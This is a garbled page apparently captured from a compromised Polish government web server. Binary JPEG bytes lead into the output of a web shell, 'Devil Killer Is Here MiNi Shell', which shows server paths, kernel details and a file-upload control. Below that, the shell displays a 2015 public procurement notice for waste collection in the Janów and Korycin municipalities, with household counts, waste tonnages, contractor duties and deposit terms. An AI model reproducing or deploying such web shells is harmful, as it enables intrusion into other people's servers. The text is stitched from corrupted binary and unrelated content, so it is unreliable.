JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151027/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151027/286028-N-2015.html

<p class="kh_header"><b>Korycin: Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu Związku Gmin Kumiałka-Biebrza</b><br>
<b>Numer ogłoszenia: 286028 - 2015; data zamieszczenia: 27.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Gmin "Kumiałka - Biebrza" z siedzibą w Korycinie , ul. Knyszyńska 2A, 16-140 Korycin, woj. podlaskie, tel. 85 8712215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zg-kumialka-biebrza.pbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu Związku Gmin Kumiałka-Biebrza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odbiór i zagospodarowanie wskazanych  w opisie przedmiotu zamówienia odpadów komunalnych powstałych i zebranych z nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie Związku Gmin Kumiałka-Biebrza tj. gmin: Janów i Korycin, oraz z  Punktu Selektywnego Zbierania Odpadów Komunalnych w Korycinie ul. Grodzieńska 36 (zwanego dalej PSZOK), w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.

2. Na terenie Związku Gmin Kumiałka-Biebrza obowiązywał będzie system mieszany    pojemnikowo-workowy zbiórki odpadów komunalnych.

3. Oznaczenie przedmiotu zamówienia według CPV (Wspólny Słownik Zamówień):
	Nazwa Kod -     90511000-2   Usługi wywozu odpadów
                                         90512000-9   Usługi transportu odpadów
		               90513100-7  	Usługi wywozu odpadów pochodzących
					  z gospodarstw domowych
			  90533000-2  	Usługi gospodarki odpadami

4. Charakterystyka przedmiotu zamówienia.
1) Przedmiotem zamówienia objęte są następujące miejscowości:
Gmina Korycin (liczba gospodarstw domowych, w których powstają odpady komunalne, zgodnie ze złożonymi deklaracjami o wysokości opłaty za gospodarowanie odpadami komunalnymi- stan na dzień 30.09.2015 r.):
1. Aulakowszczyzna - 22 
2. Białystoczek - 13 
3. Bombla - 24
4. Brody - 13
5. Długi Ług - 27
6. Dzięciołówka - 10
7. Gorszczyzna - 7
8. Korycin - 135
9. Krukowszczyzna - 50
10. Kumiała - 41
11. Laskowszczyzna - 21
12. Łomy - 11
13. Łosiniec - 8
14. Mielniki - 13
15. Nowinka - 5
16. Olszynka - 10
17. Ostra Góra - 30
18. Popiołówka - 29
19. Przesławka - 9
20. Romaszkówka - 1
21. Rudka - 12
22. Rykaczewo - 5
23. Skindzierz - 45
24. Stok - 20
25. Szaciłówka - 23
26. Szumowo - 13
27. Wojtachy - 10
28. Wyłudki - 9
29. Wyłudy - 28
30. Wysokie - 12
31. Zabrodzie - 22
32. Zagórze - 21
33. Zakale - 6

Powierzchnia gminy Korycin wynosi ok. 11 732 ha, ludność (stan na dzień 31.12.2014 r. - 3399).

Gmina Janów (liczba gospodarstw domowych, w których powstają odpady komunalne, zgodnie ze złożonymi deklaracjami o wysokości opłaty za gospodarowanie odpadami komunalnymi- stan na dzień 30.09.2015 r.):
1. Białousy - 52
2. Brzozowe Błoto - 3
3. Budno - 15
4. Budzisk - 2
5. Cieśnisk Mały - 3
6. Cieśnisk Wielki - 12
7. Cimoszka - 3
8. Franckowa Buda - 11
9. Gabrylewszczyzna - 6
10. Giełozicha - 1
11. Janów - 214
12. Jasionowa Dolina - 25
13. Kamienica - 24
14. Kizielany - 19
15. Kizielewszczyzna - 8
16. Kładziewo - 6
17. Krasne - 19
18. Kumiałka - 17
19. Kuplisk - 28
20. Kwasówka - 2
21. Łubianka - 35
22. Marchelówka - 20
23. Nowokolno - 14
24. Nowowola - 59
25. Nowy Janów - 14
26. Ostrynka - 16
27. Podłubianka - 8
28. Podtrzcianka - 2
29. Przystawka - 60
30. Rudawka - 27
31. Sitawka - 26
32. Sitkowo - 23
33. Skidlewo - 4
34. Soroczy Mostek - 9
35. Sosnowe Bagno - 3
36. Studzieńczyna - 6
37. Szczuki - 13
38. Teolin - 38
39. Trofimówka - 40
40. Trzcianka - 36
41. Wasilówka - 21
42. Zielony Gaj - 10
43. nieruchomość położona pod adresem Lebiedzin nr 54


Powierzchnia gminy Janów wynosi ok. 20 774 ha, ludność (stan na dzień 31.12.2014 r. - 4417).

Szacunkowa liczba nieruchomości zamieszkałych, objętych systemem odbierania i zagospodarowania odpadów komunalnych  wynosi w gminie Janów - 955 nieruchomości zamieszkałych i w gminie Korycin - 705  nieruchomości zamieszkałych.

2) szacunkowa ilość odpadów komunalnych, którą Wykonawca zobowiązany jest odebrać i zagospodarować z terenu Związku Gmin Kumiałka-Biebrza (nieruchomości zamieszkałe):

GMINA JANÓW 
Mg/rok
GMINA KORYCIN
Mg/rok
niesegregowane zmieszane odpady komunalne
papier i tektura
tworzywa sztuczne
szkło
metale
popiół
ok. 290
ok. 6
ok. 12
ok. 53
ok. 2,5
brak danych
ok. 285
ok. 6,5
ok. 15
ok. 46
ok. 2,5
brak danych


Przewidywana ilość odpadów segregowanych zgromadzonych w PSZOK w Korycinie: - ok. 50 Mg/rok.
Rodzaje odpadów odbieranych z PSZOK:
- odpady niebezpieczne i odpady problemowe pochodzące z gospodarstw domowych takie jak przeterminowane leki i chemikalia, farby i lakiery; 
- zużyte baterie i akumulatory pochodzące z gospodarstw domowych;
- zużyty sprzęt elektryczny i elektroniczny;
- meble i inne odpady wielkogabarytowe;
- odpady budowlane i rozbiórkowe pochodzące z gospodarstw domowych;
- zużyte opony;
- styropian, opakowania wielomateriałowe typu Tetrapak;
- folie (rolnicze, ogrodnicze i  budowlane);
- odpady zielone.

Podane ilości odbioru odpadów komunalnych stanowią wielkości orientacyjne, ilości te zostały podane w celu sporządzenia oferty. 
Faktyczne ilości odpadów, w okresie realizacji zamówienia, mogą nie pokrywać się z podanymi przez Zamawiającego. 
Zmiana liczby obsługiwanych nieruchomości (gospodarstw domowych)  związana z powstaniem lub wygaśnięciem, w trakcie realizacji zamówienia, obowiązku ponoszenia opłaty za gospodarowanie odpadami komunalnymi, oraz zmiana ilości wywożonych odpadów komunalnych nie będzie powodowała zmiany umowy ani zmiany wartości zamówienia.

5. Sposób  odbierania odpadów komunalnych:
1) odpady komunalne zmieszane i segregowane powinny być zbierane w systemie indywidualnym u źródła w pojemnikach i workach foliowych do tego celu przeznaczonych o odpowiedniej wytrzymałości zapewniającej bezpieczny z punktu widzenia technicznego i sanitarnego transport;
2) właściciel nieruchomości zapewni wyposażenie jej w pojemniki do gromadzenia odpadów komunalnych zgodnie z § 7 i 8 załącznika do uchwały Nr IV-18-15 Zgromadzenia Związku Gmin Kumiałka-Biebrza z dnia 12 października 2015 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza (Dz. Urz. Woj. Podl. z 2015 r. poz. 3288), zwanym dalej Regulaminem utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza;
3) Wykonawca zobowiązany jest do dostarczania nieodpłatnie worków do selektywnej zbiórki odpadów  wg rodzajów określonych w § 7 ust. 1 pkt 8 Regulaminu utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza tj.:
- worek żółty - tworzywa sztuczne,
- worek niebieski - papier, tektura,
- worek czerwony - puszki aluminiowe, metale,
- worek zielony - szkło,
- worek szary - popiół,	
	oraz do uzupełniania worków po każdorazowym odbiorze z nieruchomości 	zamieszkałych;
4) Wykonawca zobowiązany jest do odbioru odpadów segregowanych, zgromadzonych  w PSZOK,  zgodnie z Regulaminu utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza;
5) Wykonawca jest zobowiązany dotrzeć do osób wytwarzających odpady lub do miejsc ich gromadzenia i zebrać wszystkie odpady zgromadzone w pojemnikach lub workach;
6) odbiór odpadów zmieszanych i segregowanych z nieruchomości zamieszkałych prowadzony będzie według harmonogramu odbioru opracowanego przez Wykonawcę i uzgodnionego z Zamawiającym.  Harmonogram odbioru Wykonawca przekaże Zamawiającemu w terminie 14 dni od dnia zawarcia umowy. Zmiany harmonogramu odbioru wynikające ze zmian w wykazie nieruchomości, związanych z powstaniem lub wygaśnięciem, w trakcie realizacji zamówienia, obowiązku ponoszenia opłaty za gospodarowanie odpadami komunalnymi Wykonawca przekaże Zamawiającemu w terminie 14 dni od dnia otrzymania od Zamawiającego informacji o zmianach w wykazie nieruchomości;
7) Wykonawca jest zobowiązany do odbierania odpadów komunalnych w terminach wynikających z  uzgodnionego z Zamawiającym  harmonogramu odbioru, niezależnie od warunków atmosferycznych, w sposób nie zakłócający spoczynku nocnego, pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów oraz w sposób wykluczający mieszanie odpadów;
8) usługa obejmuje zapewnienie przez Wykonawcę dojazdu do nieruchomości trudnodostępnych poprzez zorganizowanie środków transportu, które umożliwią odbiór odpadów z tych nieruchomości; 
9) w sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany z Zamawiającym i może polegać na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie;
10) Wykonawca zobowiązany jest do odbierania odpadów w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności zapobiegania wysypywaniu się odpadów z pojemników i worków podczas dokonywania odbioru;
11) Wykonawca otrzyma od Zamawiającego szczegółowy wykaz nieruchomości, z których odbierane będą stałe odpady komunalne w terminie nie później niż 7 dni od dnia zawarcia umowy. O zmianach w wykazie nieruchomości, związanych z powstaniem lub wygaśnięciem, w trakcie realizacji zamówienia, obowiązku ponoszenia opłaty za gospodarowanie odpadami komunalnymi Zamawiający poinformuje Wykonawcę nie później niż w terminie 7 dnia od dnia powstania zmian;
12) Wykonawca zobowiązuje się do bieżącego przekazywania Zamawiającemu adresów nieruchomości, na których zamieszkują mieszkańcy i powstają odpady komunalne, a nie są one ujęte w wykazie, o którym mowa w pkt 11;
13) jeśli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia z winy Wykonawcy pojemników, Wykonawca zobowiązany będzie do   dostarczenia pojemników na swój koszt;
14) za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca;
15) Wykonawca zobowiązany jest także do zebrania odpadów leżących obok altanek śmietnikowych i pojemników jeśli będzie to wynikiem jego działania oraz odpadów tzw. luzów, które wysypały się podczas ładowania lub w wyniku opóźnionego wywozu, czy też przepełnienia pojemnika. Obowiązek ten winien być realizowany niezwłocznie po opróżnieniu pojemników;
16) Wykonawca zobowiązany jest do dystrybucji wśród właścicieli nieruchomości harmonogramu odbioru odpadów, o którym mowa w ust.  5 pkt 6.

6. Częstotliwość odbierania odpadów komunalnych:
1) opady komunalne zmieszane zbierane z nieruchomości zamieszkałych powinny być odbierane nie rzadziej niż jeden raz w miesiącu, zgodnie z § 11 ust. 2 Regulaminu utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza;
2) odpady komunalne zbierane w sposób selektywny takie jak: tworzywa sztuczne, papier i tektura, puszki aluminiowe i metale, szkło, z nieruchomości zamieszkałych powinny być odbierane nie rzadziej niż jeden raz w miesiącu, zgodnie z § 11 ust. 3 Regulaminu utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza,  popiół powinien być odbierany nie rzadziej niż jeden raz w miesiącu, w okresie od 1 stycznia do 30 kwietnia i od 1 października do 31 grudnia, zgodnie z § 11 ust. 3 i § 5 ust. 4 pkt 5 Regulaminu utrzymania czystości i porządku na terenie Związku Gmin Kumiałka-Biebrza;
3) odpady komunalne z PSZOK powinny być odbierane nie później niż w terminie 7 dni od pisemnego bądź telefonicznego zgłoszenia przez Zamawiającego konieczności odbioru odpadów,  nie rzadziej jednak  niż dwa razy w roku.

7. Obowiązki Wykonawcy w zakresie odbioru odpadów segregowanych:
1) odbiór odpadów segregowanych prowadzić należy w taki sposób, aby nie dochodziło do  mieszania poszczególnych frakcji odpadów zebranych selektywnie;
2) przy odbiorze odpadów segregowanych Wykonawca każdorazowo sprawdza:
a) rzetelność segregacji odpadów,
b) w przypadkach, gdy właściciele nieruchomości, którzy zadeklarowali, że odpady będą gromadzili w sposób selektywny, a wystawiają je tylko w sposób zmieszany lub prowadzą selekcję odpadów w sposób nieprawidłowy tj.  wrzucają do odpadów zmieszanych  odpady, które  powinny być wyselekcjonowane, Wykonawca zgłosi ten fakt Zamawiającemu w terminie 2 dni roboczych od dnia stwierdzenia opisanej sytuacji.Na tę okoliczność Wykonawca sporządzi dokumentację np. dokumentacja fotograficzna, notatka, protokół, nagranie itp., z której powinno jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do stwierdzenia opisanej sytuacji;
3) uchylanie się od obowiązku zgłaszania Zamawiającemu informacji dotyczącej zaistniałych nieprawidłowości w sposobie  segregacji odpadów będzie stanowiło naruszenie umowy;
4) wykaz nieruchomości, których właściciele zadeklarowali gromadzenie odpadów w sposób selektywny Zamawiający przekaże Wykonawcy w terminie nie później niż 7 dni od dnia zawarcia umowy.

8. Obowiązki Wykonawcy:
1) w zakresie posiadania sprzętu i środków technicznych oraz bazy magazynowo-transportowej - Wykonawca musi dysponować specjalistycznymi środkami technicznymi umożliwiającymi odbiór odpadów zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości  (Dz. U. z 2013 r.  poz. 122);
2) w zakresie sprawozdawczości:
a) Wykonawca będzie na bieżąco prowadził ilościową i jakościową ewidencję odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach,
b) przez cały okres trwania zamówienia Wykonawca zobowiązany jest do przekazywania Zamawiającemu 	sprawozdań półrocznych zgodnie z rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630), sporządzonych odrębnie dla każdej gminy - członka Związku Gmin Kumiałka-Biebrza, w terminie  do końca miesiąca następującego po półroczu, którego dotyczy sprawozdanie,
c) przez cały okres trwania zamówienia Wykonawca zobowiązany jest do przekazywania raportów miesięcznych zawierających informacje o:
- ilościach i rodzajach odpadów przekazanych do regionalnej instalacji przetwarzania 	odpadów komunalnych,
- ilościach i rodzajach selektywnie odebranych odpadów komunalnych przekazanych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami określoną w ustawie o odpadach, 
- liczbie nieruchomości, z których zostały odebrane odpady komunalne w ramach realizacji umowy,
 sporządzonych odrębnie dla każdej gminy - członka Związku Gmin Kumiałka-Biebrza w terminie 14 dni po sporządzeniu, nie później niż do końca miesiąca, następującego po miesiącu, którego dotyczy raport.  Do raportów Wykonawca dołączy kopie kart przekazania odpadów, zgodnie z rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz.U. 2014 poz. 1973) oraz kopie dokumentów potwierdzających recykling i odzysk. Karty przekazania odpadów muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu Gminy Janów bądź terenu Gminy Korycin oraz muszą być sporządzone odrębnie dla każdej gminy. 

9. Zagospodarowanie odpadów:
   1) zmieszane odpady komunalne oraz odpady zielone Wykonawca zobowiązany będzie 	zagospodarować zgodnie z Planem Gospodarki Odpadami Województwa Podlaskiego na 	lata 2012-2017, co oznacza obowiązek ich przekazywania do Instalacji Regionu Gospodarki 	Odpadami Północnego: Obszar Koszarówka, tj. ZZO Koszarówka.
	Zgodnie z uchwałami Sejmiku Województwa Podlaskiego:
	- Nr XX-233-12 z 21 czerwca  2012 r. w sprawie uchwalenia Planu Gospodarki Odpadami Województwa Podlaskiego na lata 2012 - 2017,
	- Nr XX-234-12 z 21 czerwca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa  Podlaskiego na lata 2012 - 2017  (Dz. Urz. Woj. Podl. z 2012 r. poz. 2017 i  3118, z 2014 r. poz. 3104 oraz z 2015 r. poz. 1844 i 2832),
członkowie Związku Gmin Kumiałka-Biebrza - Gminy Janów i Korycin, jako objęte projektami finansowanymi w ramach POIiŚ, ze względu na konieczność zachowania trwałości projektu oraz dla potwierdzenia efektu ekologicznego (zgodnie z umowami lub porozumieniami wynikającymi z dofinansowania POIiŚ) zobowiązane są kierować odpady do wskazanych instalacji regionalnych tj. do ZZO Koszarówka;
2) selektywnie zebrane odpady komunalne Wykonawca zobowiązany będzie przekazać do instalacji odzysku lub unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17  ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21 ze zm.).
Wykonawca wskaże w ofercie instalacje, do których będą przekazywane odpady odbierane w sposób selektywny.
3) Wykonawca podczas realizacji zamówienia zapewni osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami odpadów komunalnych następujących frakcji: papieru, metalu, tworzyw sztucznych, szkła i innych niż niebezpieczne odpadów komunalnych oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, w myśl z art. 3 ust. 2 pkt.7, art. 3b i art. 3c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. poz. 1399 z późn. zm.), rozporządzenia Ministra Środowiska z 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645), rozporządzenia Ministra Środowiska z 25 maja 2012 r. w sprawie poziomów ograniczania masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676), uchwałą Nr XX-233-12 Sejmiku Województwa Podlaskiego z 21 czerwca  2012 r. w sprawie uchwalenia Planu gospodarki odpadami województwa podlaskiego na lata 2012 - 2017, uchwałą Nr XX-234-12 Sejmiku Województwa Podlaskiego z 21 czerwca 2012 r. w sprawie wykonania Planu gospodarki odpadami województwa  podlaskiego na lata 2012 - 2017  (Dz. Urz. Woj. Podl. z 2012 r. poz. 2017 z późn. zm.);
4) Wykonawca ponosi odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami, zgodnie z przepisami obowiązującymi w tym zakresie, w tym za osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami odpadów komunalnych następujących frakcji: papieru, metalu, tworzyw sztucznych, szkła i innych niż niebezpieczne odpadów komunalnych oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.  

10. Zamawiający nie dopuszcza odbierania tym samym pojazdem przez Wykonawcę odpadów komunalnych jednocześnie z jakimikolwiek innymi odpadami komunalnymi, w tym pochodzącymi z nieruchomości niezamieszkałych z terenu Związku Gmin Kumiałka-Biebrza.

11. Rozliczanie świadczonych usług następować będzie ryczałtowo. Wynagrodzenie należne Wykonawcy będzie płatne w okresach kwartalnych, po wykonaniu usługi za dany kwartał oraz wystawieniu faktury przez Wykonawcę.

12. Wykonawca przed złożeniem oferty, jeżeli uzna to za celowe, może zapoznać się  z   terenem, na którym będzie prowadzona działalność. Mapy terenu gmin: Janów i Korycin stanowią załączniki nr 9a i 9b do SIWZ.
Zapoznanie się z lokalnymi warunkami terenowymi związanymi z realizacją zamówienia jest uzasadnione, gdyż na terenie gmin: Janów i Korycin występują nieruchomości, do których dojazd ciężkim specjalistycznym sprzętem odbierającym odpady, ze względu na specyficzne uwarunkowania może być utrudniony, np.: droga gruntowa, roztopy, brak miejsca na manewrowanie pojazdem, itp..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest do wniesienia wadium.

2. Kwota wadium: 5 000,00 PLN (słownie: pięć tysięcy złotych).

3. Termin złożenia wadium: przed upływem terminu składania ofert.

4. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy. 

5. W przypadku wniesienia wadium w pieniądzu należy dokonać tego przelewem na rachunek bankowy Zamawiającego 79 8077 0000 0000 0954 2000 0030.

6. Wadium wnoszone w pieniądzu powinno wpłynąć na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.

7. Wadium wnoszone w innej formie niż w pieniądzu, musi zostać złożone w oryginale w Biurze Związku Gmin Kumiałka-Biebrza przy ul. Słowiańskiej 14 (wiatrak) i być ważne przez cały okres związania ofertą. 

8. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej w ich treści winien znajdować się zapis o tym, że jest ona nieodwołalna, bezwarunkowa i płatna na pierwsze żądanie Zamawiającego.

9. Z wniesionego wadium w pieniądzu oraz treści gwarancji i poręczeń, o których mowa w art. 45 ust. 6 pkt 2-5 ustawy musi wynikać, że wadium zabezpiecza ofertę Wykonawcy złożoną w postępowaniu o udzielenie zamówienia na odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu Związku Gmin Kumiałka-Biebrza.

10. Nie należy załączać oryginału dokumentu potwierdzającego wniesienie wadium do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
